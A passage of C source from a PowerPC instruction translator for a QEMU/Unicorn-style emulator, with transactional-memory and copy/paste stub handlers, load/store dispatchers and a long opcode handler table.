* \ * CR[0] = 0b0 || MSR[TS] || 0b0 \ * = 0b0 || 0b00 || 0b0 \ */ \ tcg_gen_movi_i32(tcg_ctx, cpu_crf[0], 0); \ } GEN_TM_NOOP(tend); GEN_TM_NOOP(tabort); GEN_TM_NOOP(tabortwc); GEN_TM_NOOP(tabortwci); GEN_TM_NOOP(tabortdc); GEN_TM_NOOP(tabortdci); GEN_TM_NOOP(tsr); static inline void gen_cp_abort(DisasContext *ctx) { /* Do Nothing */ } #define GEN_CP_PASTE_NOOP(name) \ static inline void gen_##name(DisasContext *ctx) \ { \ /* \ * Generate invalid exception until we have an \ * implementation of the copy paste facility \ */ \ gen_invalid(ctx); \ } GEN_CP_PASTE_NOOP(copy) GEN_CP_PASTE_NOOP(paste) static void gen_tcheck(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->tm_enabled)) { gen_exception_err(ctx, POWERPC_EXCP_FU, FSCR_IC_TM); return; } /* * Because tbegin always fails, the tcheck implementation is * simple: * * CR[CRF] = TDOOMED || MSR[TS] || 0b0 * = 0b1 || 0b00 || 0b0 */ tcg_gen_movi_i32(tcg_ctx, cpu_crf[crfD(ctx->opcode)], 0x8); } #define GEN_TM_PRIV_NOOP(name) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ CHK_SV; \ if (unlikely(!ctx->tm_enabled)) { \ gen_exception_err(ctx, POWERPC_EXCP_FU, FSCR_IC_TM); \ return; \ } \ /* \ * Because tbegin always fails, the implementation is \ * simple: \ * \ * CR[0] = 0b0 || MSR[TS] || 0b0 \ * = 0b0 || 0b00 || 0b0 \ */ \ tcg_gen_movi_i32(tcg_ctx, cpu_crf[0], 0); \ } GEN_TM_PRIV_NOOP(treclaim); GEN_TM_PRIV_NOOP(trechkpt); static inline void get_fpr(TCGContext *tcg_ctx, TCGv_i64 dst, int regno) { tcg_gen_ld_i64(tcg_ctx, dst, tcg_ctx->cpu_env, fpr_offset(regno)); } static inline void set_fpr(TCGContext *tcg_ctx, int regno, TCGv_i64 src) { tcg_gen_st_i64(tcg_ctx, src, tcg_ctx->cpu_env, fpr_offset(regno)); } static inline void get_avr64(TCGContext *tcg_ctx, TCGv_i64 dst, int regno, bool high) { tcg_gen_ld_i64(tcg_ctx, dst, tcg_ctx->cpu_env, avr64_offset(regno, high)); } static inline void set_avr64(TCGContext *tcg_ctx, int regno, TCGv_i64 src, bool high) { tcg_gen_st_i64(tcg_ctx, src, tcg_ctx->cpu_env, avr64_offset(regno, high)); } #include "translate/fp-impl.inc.c" #include "translate/vmx-impl.inc.c" #include "translate/vsx-impl.inc.c" #include "translate/dfp-impl.inc.c" #include "translate/spe-impl.inc.c" /* Handles lfdp, lxsd, lxssp */ static void gen_dform39(DisasContext *ctx) { switch (ctx->opcode & 0x3) { case 0: /* lfdp */ if (ctx->insns_flags2 & PPC2_ISA205) { return gen_lfdp(ctx); } break; case 2: /* lxsd */ if (ctx->insns_flags2 & PPC2_ISA300) { return gen_lxsd(ctx); } break; case 3: /* lxssp */ if (ctx->insns_flags2 & PPC2_ISA300) { return gen_lxssp(ctx); } break; } return gen_invalid(ctx); } /* handles stfdp, lxv, stxsd, stxssp, lxvx */ static void gen_dform3D(DisasContext *ctx) { if ((ctx->opcode & 3) == 1) { /* DQ-FORM */ switch (ctx->opcode & 0x7) { case 1: /* lxv */ if (ctx->insns_flags2 & PPC2_ISA300) { return gen_lxv(ctx); } break; case 5: /* stxv */ if (ctx->insns_flags2 & PPC2_ISA300) { return gen_stxv(ctx); } break; } } else { /* DS-FORM */ switch (ctx->opcode & 0x3) { case 0: /* stfdp */ if (ctx->insns_flags2 & PPC2_ISA205) { return gen_stfdp(ctx); } break; case 2: /* stxsd */ if (ctx->insns_flags2 & PPC2_ISA300) { return gen_stxsd(ctx); } break; case 3: /* stxssp */ if (ctx->insns_flags2 & PPC2_ISA300) { return gen_stxssp(ctx); } break; } } return gen_invalid(ctx); } static opcode_t opcodes[] = { GEN_HANDLER(invalid, 0x00, 0x00, 0x00, 0xFFFFFFFF, PPC_NONE), GEN_HANDLER(cmp, 0x1F, 0x00, 0x00, 0x00400000, PPC_INTEGER), GEN_HANDLER(cmpi, 0x0B, 0xFF,
0xFF, 0x00400000, PPC_INTEGER), GEN_HANDLER(cmpl, 0x1F, 0x00, 0x01, 0x00400001, PPC_INTEGER), GEN_HANDLER(cmpli, 0x0A, 0xFF, 0xFF, 0x00400000, PPC_INTEGER), #if defined(TARGET_PPC64) GEN_HANDLER_E(cmpeqb, 0x1F, 0x00, 0x07, 0x00600000, PPC_NONE, PPC2_ISA300), #endif GEN_HANDLER_E(cmpb, 0x1F, 0x1C, 0x0F, 0x00000001, PPC_NONE, PPC2_ISA205), GEN_HANDLER_E(cmprb, 0x1F, 0x00, 0x06, 0x00400001, PPC_NONE, PPC2_ISA300), GEN_HANDLER(isel, 0x1F, 0x0F, 0xFF, 0x00000001, PPC_ISEL), GEN_HANDLER(addi, 0x0E, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(addic, 0x0C, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER2(addic_, "addic.", 0x0D, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(addis, 0x0F, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER_E(addpcis, 0x13, 0x2, 0xFF, 0x00000000, PPC_NONE, PPC2_ISA300), GEN_HANDLER(mulhw, 0x1F, 0x0B, 0x02, 0x00000400, PPC_INTEGER), GEN_HANDLER(mulhwu, 0x1F, 0x0B, 0x00, 0x00000400, PPC_INTEGER), GEN_HANDLER(mullw, 0x1F, 0x0B, 0x07, 0x00000000, PPC_INTEGER), GEN_HANDLER(mullwo, 0x1F, 0x0B, 0x17, 0x00000000, PPC_INTEGER), GEN_HANDLER(mulli, 0x07, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), #if defined(TARGET_PPC64) GEN_HANDLER(mulld, 0x1F, 0x09, 0x07, 0x00000000, PPC_64B), #endif GEN_HANDLER(neg, 0x1F, 0x08, 0x03, 0x0000F800, PPC_INTEGER), GEN_HANDLER(nego, 0x1F, 0x08, 0x13, 0x0000F800, PPC_INTEGER), GEN_HANDLER(subfic, 0x08, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER2(andi_, "andi.", 0x1C, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER2(andis_, "andis.", 0x1D, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(cntlzw, 0x1F, 0x1A, 0x00, 0x00000000, PPC_INTEGER), GEN_HANDLER_E(cnttzw, 0x1F, 0x1A, 0x10, 0x00000000, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(copy, 0x1F, 0x06, 0x18, 0x03C00001, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(cp_abort, 0x1F, 0x06, 0x1A, 0x03FFF801, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(paste, 0x1F, 0x06, 0x1C, 0x03C00000, PPC_NONE, PPC2_ISA300), GEN_HANDLER(or, 0x1F, 0x1C, 0x0D, 0x00000000, PPC_INTEGER), GEN_HANDLER(xor, 0x1F, 0x1C, 0x09, 0x00000000, PPC_INTEGER), GEN_HANDLER(ori, 0x18, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(oris, 0x19, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(xori, 0x1A, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(xoris, 0x1B, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(popcntb, 0x1F, 0x1A, 0x03, 0x0000F801, PPC_POPCNTB), GEN_HANDLER(popcntw, 0x1F, 0x1A, 0x0b, 0x0000F801, PPC_POPCNTWD), GEN_HANDLER_E(prtyw, 0x1F, 0x1A, 0x04, 0x0000F801, PPC_NONE, PPC2_ISA205), #if defined(TARGET_PPC64) GEN_HANDLER(popcntd, 0x1F, 0x1A, 0x0F, 0x0000F801, PPC_POPCNTWD), GEN_HANDLER(cntlzd, 0x1F, 0x1A, 0x01, 0x00000000, PPC_64B), GEN_HANDLER_E(cnttzd, 0x1F, 0x1A, 0x11, 0x00000000, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(darn, 0x1F, 0x13, 0x17, 0x001CF801, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(prtyd, 0x1F, 0x1A, 0x05, 0x0000F801, PPC_NONE, PPC2_ISA205), GEN_HANDLER_E(bpermd, 0x1F, 0x1C, 0x07, 0x00000001, PPC_NONE, PPC2_PERM_ISA206), #endif GEN_HANDLER(rlwimi, 0x14, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(rlwinm, 0x15, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(rlwnm, 0x17, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(slw, 0x1F, 0x18, 0x00, 0x00000000, PPC_INTEGER), GEN_HANDLER(sraw, 0x1F, 0x18, 0x18, 0x00000000, PPC_INTEGER), GEN_HANDLER(srawi, 0x1F, 0x18, 0x19, 0x00000000, PPC_INTEGER), GEN_HANDLER(srw, 0x1F, 0x18, 0x10, 0x00000000, PPC_INTEGER), #if defined(TARGET_PPC64) GEN_HANDLER(sld, 0x1F, 0x1B, 0x00, 0x00000000, PPC_64B), GEN_HANDLER(srad, 0x1F, 0x1A, 0x18, 0x00000000, PPC_64B), 
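/*
 * sradi's 6-bit shift count keeps its top bit in the opc2 field, which is
 * why the single mnemonic needs the two table entries below; extswsli is
 * split the same way.
 */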
GEN_HANDLER2(sradi0, "sradi", 0x1F, 0x1A, 0x19, 0x00000000, PPC_64B), GEN_HANDLER2(sradi1, "sradi", 0x1F, 0x1B, 0x19, 0x00000000, PPC_64B), GEN_HANDLER(srd, 0x1F, 0x1B, 0x10, 0x00000000, PPC_64B), GEN_HANDLER2_E(extswsli0, "extswsli", 0x1F, 0x1A, 0x1B, 0x00000000, PPC_NONE, PPC2_ISA300), GEN_HANDLER2_E(extswsli1, "extswsli", 0x1F, 0x1B, 0x1B, 0x00000000, PPC_NONE, PPC2_ISA300), #endif #if defined(TARGET_PPC64) GEN_HANDLER(ld, 0x3A, 0xFF, 0xFF, 0x00000000, PPC_64B), GEN_HANDLER(lq, 0x38, 0xFF, 0xFF, 0x00000000, PPC_64BX), GEN_HANDLER(std, 0x3E, 0xFF, 0xFF, 0x00000000, PPC_64B), #endif /* handles lfdp, lxsd, lxssp */ GEN_HANDLER_E(dform39, 0x39, 0xFF, 0xFF, 0x00000000, PPC_NONE, PPC2_ISA205), /* handles stfdp, lxv, stxsd, stxssp, stxv */ GEN_HANDLER_E(dform3D, 0x3D, 0xFF, 0xFF, 0x00000000, PPC_NONE, PPC2_ISA205), GEN_HANDLER(lmw, 0x2E, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(stmw, 0x2F, 0xFF, 0xFF, 0x00000000, PPC_INTEGER), GEN_HANDLER(lswi, 0x1F, 0x15, 0x12, 0x00000001, PPC_STRING), GEN_HANDLER(lswx, 0x1F, 0x15, 0x10, 0x00000001, PPC_STRING), GEN_HANDLER(stswi, 0x1F, 0x15, 0x16, 0x00000001, PPC_STRING), GEN_HANDLER(stswx, 0x1F, 0x15, 0x14, 0x00000001, PPC_STRING), GEN_HANDLER(eieio, 0x1F, 0x16, 0x1A, 0x01FFF801, PPC_MEM_EIEIO), GEN_HANDLER(isync, 0x13, 0x16, 0x04, 0x03FFF801, PPC_MEM), GEN_HANDLER_E(lbarx, 0x1F, 0x14, 0x01, 0, PPC_NONE, PPC2_ATOMIC_ISA206), GEN_HANDLER_E(lharx, 0x1F, 0x14, 0x03, 0, PPC_NONE, PPC2_ATOMIC_ISA206), GEN_HANDLER(lwarx, 0x1F, 0x14, 0x00, 0x00000000, PPC_RES), GEN_HANDLER_E(lwat, 0x1F, 0x06, 0x12, 0x00000001, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(stwat, 0x1F, 0x06, 0x16, 0x00000001, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(stbcx_, 0x1F, 0x16, 0x15, 0, PPC_NONE, PPC2_ATOMIC_ISA206), GEN_HANDLER_E(sthcx_, 0x1F, 0x16, 0x16, 0, PPC_NONE, PPC2_ATOMIC_ISA206), GEN_HANDLER2(stwcx_, "stwcx.", 0x1F, 0x16, 0x04, 0x00000000, PPC_RES), #if defined(TARGET_PPC64) GEN_HANDLER_E(ldat, 0x1F, 0x06, 0x13, 0x00000001, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(stdat, 0x1F, 0x06, 0x17, 0x00000001, PPC_NONE, PPC2_ISA300), GEN_HANDLER(ldarx, 0x1F, 0x14, 0x02, 0x00000000, PPC_64B), GEN_HANDLER_E(lqarx, 0x1F, 0x14, 0x08, 0, PPC_NONE, PPC2_LSQ_ISA207), GEN_HANDLER2(stdcx_, "stdcx.", 0x1F, 0x16, 0x06, 0x00000000, PPC_64B), GEN_HANDLER_E(stqcx_, 0x1F, 0x16, 0x05, 0, PPC_NONE, PPC2_LSQ_ISA207), #endif GEN_HANDLER(sync, 0x1F, 0x16, 0x12, 0x039FF801, PPC_MEM_SYNC), GEN_HANDLER(wait, 0x1F, 0x1E, 0x01, 0x03FFF801, PPC_WAIT), GEN_HANDLER_E(wait, 0x1F, 0x1E, 0x00, 0x039FF801, PPC_NONE, PPC2_ISA300), GEN_HANDLER(b, 0x12, 0xFF, 0xFF, 0x00000000, PPC_FLOW), GEN_HANDLER(bc, 0x10, 0xFF, 0xFF, 0x00000000, PPC_FLOW), GEN_HANDLER(bcctr, 0x13, 0x10, 0x10, 0x00000000, PPC_FLOW), GEN_HANDLER(bclr, 0x13, 0x10, 0x00, 0x00000000, PPC_FLOW), GEN_HANDLER_E(bctar, 0x13, 0x10, 0x11, 0x0000E000, PPC_NONE, PPC2_BCTAR_ISA207), GEN_HANDLER(mcrf, 0x13, 0x00, 0xFF, 0x00000001, PPC_INTEGER), GEN_HANDLER(rfi, 0x13, 0x12, 0x01, 0x03FF8001, PPC_FLOW), #if defined(TARGET_PPC64) GEN_HANDLER(rfid, 0x13, 0x12, 0x00, 0x03FF8001, PPC_64B), GEN_HANDLER_E(stop, 0x13, 0x12, 0x0b, 0x03FFF801, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(doze, 0x13, 0x12, 0x0c, 0x03FFF801, PPC_NONE, PPC2_PM_ISA206), GEN_HANDLER_E(nap, 0x13, 0x12, 0x0d, 0x03FFF801, PPC_NONE, PPC2_PM_ISA206), GEN_HANDLER_E(sleep, 0x13, 0x12, 0x0e, 0x03FFF801, PPC_NONE, PPC2_PM_ISA206), GEN_HANDLER_E(rvwinkle, 0x13, 0x12, 0x0f, 0x03FFF801, PPC_NONE, PPC2_PM_ISA206), GEN_HANDLER(hrfid, 0x13, 0x12, 0x08, 0x03FF8001, PPC_64H), #endif GEN_HANDLER(sc, 0x11, 0xFF, 0xFF, 0x03FFF01D, 
PPC_FLOW), GEN_HANDLER(tw, 0x1F, 0x04, 0x00, 0x00000001, PPC_FLOW), GEN_HANDLER(twi, 0x03, 0xFF, 0xFF, 0x00000000, PPC_FLOW), #if defined(TARGET_PPC64) GEN_HANDLER(td, 0x1F, 0x04, 0x02, 0x00000001, PPC_64B), GEN_HANDLER(tdi, 0x02, 0xFF, 0xFF, 0x00000000, PPC_64B), #endif GEN_HANDLER(mcrxr, 0x1F, 0x00, 0x10, 0x007FF801, PPC_MISC), GEN_HANDLER(mfcr, 0x1F, 0x13, 0x00, 0x00000801, PPC_MISC), GEN_HANDLER(mfmsr, 0x1F, 0x13, 0x02, 0x001FF801, PPC_MISC), GEN_HANDLER(mfspr, 0x1F, 0x13, 0x0A, 0x00000001, PPC_MISC), GEN_HANDLER(mftb, 0x1F, 0x13, 0x0B, 0x00000001, PPC_MFTB), GEN_HANDLER(mtcrf, 0x1F, 0x10, 0x04, 0x00000801, PPC_MISC), #if defined(TARGET_PPC64) GEN_HANDLER(mtmsrd, 0x1F, 0x12, 0x05, 0x001EF801, PPC_64B), GEN_HANDLER_E(setb, 0x1F, 0x00, 0x04, 0x0003F801, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(mcrxrx, 0x1F, 0x00, 0x12, 0x007FF801, PPC_NONE, PPC2_ISA300), #endif GEN_HANDLER(mtmsr, 0x1F, 0x12, 0x04, 0x001EF801, PPC_MISC), GEN_HANDLER(mtspr, 0x1F, 0x13, 0x0E, 0x00000000, PPC_MISC), GEN_HANDLER(dcbf, 0x1F, 0x16, 0x02, 0x03C00001, PPC_CACHE), GEN_HANDLER_E(dcbfep, 0x1F, 0x1F, 0x03, 0x03C00001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER(dcbi, 0x1F, 0x16, 0x0E, 0x03E00001, PPC_CACHE), GEN_HANDLER(dcbst, 0x1F, 0x16, 0x01, 0x03E00001, PPC_CACHE), GEN_HANDLER_E(dcbstep, 0x1F, 0x1F, 0x01, 0x03E00001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER(dcbt, 0x1F, 0x16, 0x08, 0x00000001, PPC_CACHE), GEN_HANDLER_E(dcbtep, 0x1F, 0x1F, 0x09, 0x00000001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER(dcbtst, 0x1F, 0x16, 0x07, 0x00000001, PPC_CACHE), GEN_HANDLER_E(dcbtstep, 0x1F, 0x1F, 0x07, 0x00000001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER_E(dcbtls, 0x1F, 0x06, 0x05, 0x02000001, PPC_BOOKE, PPC2_BOOKE206), GEN_HANDLER(dcbz, 0x1F, 0x16, 0x1F, 0x03C00001, PPC_CACHE_DCBZ), GEN_HANDLER_E(dcbzep, 0x1F, 0x1F, 0x1F, 0x03C00001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER(dst, 0x1F, 0x16, 0x0A, 0x01800001, PPC_ALTIVEC), GEN_HANDLER(dstst, 0x1F, 0x16, 0x0B, 0x01800001, PPC_ALTIVEC), GEN_HANDLER(dss, 0x1F, 0x16, 0x19, 0x019FF801, PPC_ALTIVEC), GEN_HANDLER(icbi, 0x1F, 0x16, 0x1E, 0x03E00001, PPC_CACHE_ICBI), GEN_HANDLER_E(icbiep, 0x1F, 0x1F, 0x1E, 0x03E00001, PPC_NONE, PPC2_BOOKE206), GEN_HANDLER(dcba, 0x1F, 0x16, 0x17, 0x03E00001, PPC_CACHE_DCBA), GEN_HANDLER(mfsr, 0x1F, 0x13, 0x12, 0x0010F801, PPC_SEGMENT), GEN_HANDLER(mfsrin, 0x1F, 0x13, 0x14, 0x001F0001, PPC_SEGMENT), GEN_HANDLER(mtsr, 0x1F, 0x12, 0x06, 0x0010F801, PPC_SEGMENT), GEN_HANDLER(mtsrin, 0x1F, 0x12, 0x07, 0x001F0001, PPC_SEGMENT), #if defined(TARGET_PPC64) GEN_HANDLER2(mfsr_64b, "mfsr", 0x1F, 0x13, 0x12, 0x0010F801, PPC_SEGMENT_64B), GEN_HANDLER2(mfsrin_64b, "mfsrin", 0x1F, 0x13, 0x14, 0x001F0001, PPC_SEGMENT_64B), GEN_HANDLER2(mtsr_64b, "mtsr", 0x1F, 0x12, 0x06, 0x0010F801, PPC_SEGMENT_64B), GEN_HANDLER2(mtsrin_64b, "mtsrin", 0x1F, 0x12, 0x07, 0x001F0001, PPC_SEGMENT_64B), GEN_HANDLER2(slbmte, "slbmte", 0x1F, 0x12, 0x0C, 0x001F0001, PPC_SEGMENT_64B), GEN_HANDLER2(slbmfee, "slbmfee", 0x1F, 0x13, 0x1C, 0x001F0001, PPC_SEGMENT_64B), GEN_HANDLER2(slbmfev, "slbmfev", 0x1F, 0x13, 0x1A, 0x001F0001, PPC_SEGMENT_64B), GEN_HANDLER2(slbfee_, "slbfee.", 0x1F, 0x13, 0x1E, 0x001F0000, PPC_SEGMENT_64B), #endif GEN_HANDLER(tlbia, 0x1F, 0x12, 0x0B, 0x03FFFC01, PPC_MEM_TLBIA), /* * XXX Those instructions will need to be handled differently for * different ISA versions */ GEN_HANDLER(tlbiel, 0x1F, 0x12, 0x08, 0x001F0001, PPC_MEM_TLBIE), GEN_HANDLER(tlbie, 0x1F, 0x12, 0x09, 0x001F0001, PPC_MEM_TLBIE), GEN_HANDLER_E(tlbiel, 0x1F, 0x12, 0x08, 0x00100001, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(tlbie, 0x1F, 
0x12, 0x09, 0x00100001, PPC_NONE, PPC2_ISA300), GEN_HANDLER(tlbsync, 0x1F, 0x16, 0x11, 0x03FFF801, PPC_MEM_TLBSYNC), #if defined(TARGET_PPC64) GEN_HANDLER(slbia, 0x1F, 0x12, 0x0F, 0x031FFC01, PPC_SLBI), GEN_HANDLER(slbie, 0x1F, 0x12, 0x0D, 0x03FF0001, PPC_SLBI), GEN_HANDLER_E(slbieg, 0x1F, 0x12, 0x0E, 0x001F0001, PPC_NONE, PPC2_ISA300), GEN_HANDLER_E(slbsync, 0x1F, 0x12, 0x0A, 0x03FFF801, PPC_NONE, PPC2_ISA300), #endif GEN_HANDLER(eciwx, 0x1F, 0x16, 0x0D, 0x00000001, PPC_EXTERN), GEN_HANDLER(ecowx, 0x1F, 0x16, 0x09, 0x00000001, PPC_EXTERN), GEN_HANDLER(abs, 0x1F, 0x08, 0x0B, 0x0000F800, PPC_POWER_BR), GEN_HANDLER(abso, 0x1F, 0x08, 0x1B, 0x0000F800, PPC_POWER_BR), GEN_HANDLER(clcs, 0x1F, 0x10, 0x13, 0x0000F800, PPC_POWER_BR), GEN_HANDLER(div, 0x1F, 0x0B, 0x0A, 0x00000000, PPC_POWER_BR), GEN_HANDLER(divo, 0x1F, 0x0B, 0x1A, 0x00000000, PPC_POWER_BR), GEN_HANDLER(divs, 0x1F, 0x0B, 0x0B, 0x00000000, PPC_POWER_BR), GEN_HANDLER(divso, 0x1F, 0x0B, 0x1B, 0x00000000, PPC_POWER_BR), GEN_HANDLER(doz, 0x1F, 0x08, 0x08, 0x00000000, PPC_POWER_BR), GEN_HANDLER(dozo, 0x1F, 0x08, 0x18, 0x00000000, PPC_POWER_BR), GEN_HANDLER(dozi, 0x09, 0xFF, 0xFF, 0x00000000, PPC_POWER_BR), GEN_HANDLER(lscbx, 0x1F, 0x15, 0x08, 0x00000000, PPC_POWER_BR), GEN_HANDLER(maskg, 0x1F, 0x1D, 0x00, 0x00000000, PPC_POWER_BR), GEN_HANDLER(maskir, 0x1F, 0x1D, 0x10, 0x00000000, PPC_POWER_BR), GEN_HANDLER(mul, 0x1F, 0x0B, 0x03, 0x00000000, PPC_POWER_BR), GEN_HANDLER(mulo, 0x1F, 0x0B, 0x13, 0x00000000, PPC_POWER_BR), GEN_HANDLER(nabs, 0x1F, 0x08, 0x0F, 0x00000000, PPC_POWER_BR), GEN_HANDLER(nabso, 0x1F, 0x08, 0x1F, 0x00000000, PPC_POWER_BR), GEN_HANDLER(rlmi, 0x16, 0xFF, 0xFF, 0x00000000, PPC_POWER_BR), GEN_HANDLER(rrib, 0x1F, 0x19, 0x10, 0x00000000, PPC_POWER_BR), GEN_HANDLER(sle, 0x1F, 0x19, 0x04, 0x00000000, PPC_POWER_BR), GEN_HANDLER(sleq, 0x1F, 0x19, 0x06, 0x00000000, PPC_POWER_BR), GEN_HANDLER(sliq, 0x1F, 0x18, 0x05, 0x00000000, PPC_POWER_BR), GEN_HANDLER(slliq, 0x1F, 0x18, 0x07, 0x00000000, PPC_POWER_BR), GEN_HANDLER(sllq, 0x1F, 0x18, 0x06, 0x00000000, PPC_POWER_BR), GEN_HANDLER(slq, 0x1F, 0x18, 0x04, 0x00000000, PPC_POWER_BR), GEN_HANDLER(sraiq, 0x1F, 0x18, 0x1D, 0x00000000, PPC_POWER_BR), GEN_HANDLER(sraq, 0x1F, 0x18, 0x1C, 0x00000000, PPC_POWER_BR), GEN_HANDLER(sre, 0x1F, 0x19, 0x14, 0x00000000, PPC_POWER_BR), GEN_HANDLER(srea, 0x1F, 0x19, 0x1C, 0x00000000, PPC_POWER_BR), GEN_HANDLER(sreq, 0x1F, 0x19, 0x16, 0x00000000, PPC_POWER_BR), GEN_HANDLER(sriq, 0x1F, 0x18, 0x15, 0x00000000, PPC_POWER_BR), GEN_HANDLER(srliq, 0x1F, 0x18, 0x17, 0x00000000, PPC_POWER_BR), GEN_HANDLER(srlq, 0x1F, 0x18, 0x16, 0x00000000, PPC_POWER_BR), GEN_HANDLER(srq, 0x1F, 0x18, 0x14, 0x00000000, PPC_POWER_BR), GEN_HANDLER(dsa, 0x1F, 0x14, 0x13, 0x03FFF801, PPC_602_SPEC), GEN_HANDLER(esa, 0x1F, 0x14, 0x12, 0x03FFF801, PPC_602_SPEC), GEN_HANDLER(mfrom, 0x1F, 0x09, 0x08, 0x03E0F801, PPC_602_SPEC), GEN_HANDLER2(tlbld_6xx, "tlbld", 0x1F, 0x12, 0x1E, 0x03FF0001, PPC_6xx_TLB), GEN_HANDLER2(tlbli_6xx, "tlbli", 0x1F, 0x12, 0x1F, 0x03FF0001, PPC_6xx_TLB), GEN_HANDLER2(tlbld_74xx, "tlbld", 0x1F, 0x12, 0x1E, 0x03FF0001, PPC_74xx_TLB), GEN_HANDLER2(tlbli_74xx, "tlbli", 0x1F, 0x12, 0x1F, 0x03FF0001, PPC_74xx_TLB), GEN_HANDLER(clf, 0x1F, 0x16, 0x03, 0x03E00000, PPC_POWER), GEN_HANDLER(cli, 0x1F, 0x16, 0x0F, 0x03E00000, PPC_POWER), GEN_HANDLER(dclst, 0x1F, 0x16, 0x13, 0x03E00000, PPC_POWER), GEN_HANDLER(mfsri, 0x1F, 0x13, 0x13, 0x00000001, PPC_POWER), GEN_HANDLER(rac, 0x1F, 0x12, 0x19, 0x00000001, PPC_POWER), GEN_HANDLER(rfsvc, 0x13, 0x12, 0x02, 0x03FFF0001, PPC_POWER), 
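/*
 * Editor's note (commentary added for readability, not part of the original
 * table): each GEN_HANDLER(name, opc1, opc2, opc3, inval, type) entry binds
 * gen_<name>() into the decode tables. opc1 is the 6-bit primary opcode,
 * opc2/opc3 index the indirect sub-tables used for extended opcodes, inval
 * is a mask of encoding bits that must be zero for the instruction form to
 * be valid, and type is the PPC_* feature group matched against
 * env->insns_flags. The exact bit positions come from the opc1()/opc2()/
 * opc3() helpers elsewhere in this file; treat this summary as a reading
 * aid rather than normative documentation.
 */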
GEN_HANDLER(lfq, 0x38, 0xFF, 0xFF, 0x00000003, PPC_POWER2), GEN_HANDLER(lfqu, 0x39, 0xFF, 0xFF, 0x00000003, PPC_POWER2), GEN_HANDLER(lfqux, 0x1F, 0x17, 0x19, 0x00000001, PPC_POWER2), GEN_HANDLER(lfqx, 0x1F, 0x17, 0x18, 0x00000001, PPC_POWER2), GEN_HANDLER(stfq, 0x3C, 0xFF, 0xFF, 0x00000003, PPC_POWER2), GEN_HANDLER(stfqu, 0x3D, 0xFF, 0xFF, 0x00000003, PPC_POWER2), GEN_HANDLER(stfqux, 0x1F, 0x17, 0x1D, 0x00000001, PPC_POWER2), GEN_HANDLER(stfqx, 0x1F, 0x17, 0x1C, 0x00000001, PPC_POWER2), GEN_HANDLER(mfapidi, 0x1F, 0x13, 0x08, 0x0000F801, PPC_MFAPIDI), GEN_HANDLER(tlbiva, 0x1F, 0x12, 0x18, 0x03FFF801, PPC_TLBIVA), GEN_HANDLER(mfdcr, 0x1F, 0x03, 0x0A, 0x00000001, PPC_DCR), GEN_HANDLER(mtdcr, 0x1F, 0x03, 0x0E, 0x00000001, PPC_DCR), GEN_HANDLER(mfdcrx, 0x1F, 0x03, 0x08, 0x00000000, PPC_DCRX), GEN_HANDLER(mtdcrx, 0x1F, 0x03, 0x0C, 0x00000000, PPC_DCRX), GEN_HANDLER(mfdcrux, 0x1F, 0x03, 0x09, 0x00000000, PPC_DCRUX), GEN_HANDLER(mtdcrux, 0x1F, 0x03, 0x0D, 0x00000000, PPC_DCRUX), GEN_HANDLER(dccci, 0x1F, 0x06, 0x0E, 0x03E00001, PPC_4xx_COMMON), GEN_HANDLER(dcread, 0x1F, 0x06, 0x0F, 0x00000001, PPC_4xx_COMMON), GEN_HANDLER2(icbt_40x, "icbt", 0x1F, 0x06, 0x08, 0x03E00001, PPC_40x_ICBT), GEN_HANDLER(iccci, 0x1F, 0x06, 0x1E, 0x00000001, PPC_4xx_COMMON), GEN_HANDLER(icread, 0x1F, 0x06, 0x1F, 0x03E00001, PPC_4xx_COMMON), GEN_HANDLER2(rfci_40x, "rfci", 0x13, 0x13, 0x01, 0x03FF8001, PPC_40x_EXCP), GEN_HANDLER_E(rfci, 0x13, 0x13, 0x01, 0x03FF8001, PPC_BOOKE, PPC2_BOOKE206), GEN_HANDLER(rfdi, 0x13, 0x07, 0x01, 0x03FF8001, PPC_RFDI), GEN_HANDLER(rfmci, 0x13, 0x06, 0x01, 0x03FF8001, PPC_RFMCI), GEN_HANDLER2(tlbre_40x, "tlbre", 0x1F, 0x12, 0x1D, 0x00000001, PPC_40x_TLB), GEN_HANDLER2(tlbsx_40x, "tlbsx", 0x1F, 0x12, 0x1C, 0x00000000, PPC_40x_TLB), GEN_HANDLER2(tlbwe_40x, "tlbwe", 0x1F, 0x12, 0x1E, 0x00000001, PPC_40x_TLB), GEN_HANDLER2(tlbre_440, "tlbre", 0x1F, 0x12, 0x1D, 0x00000001, PPC_BOOKE), GEN_HANDLER2(tlbsx_440, "tlbsx", 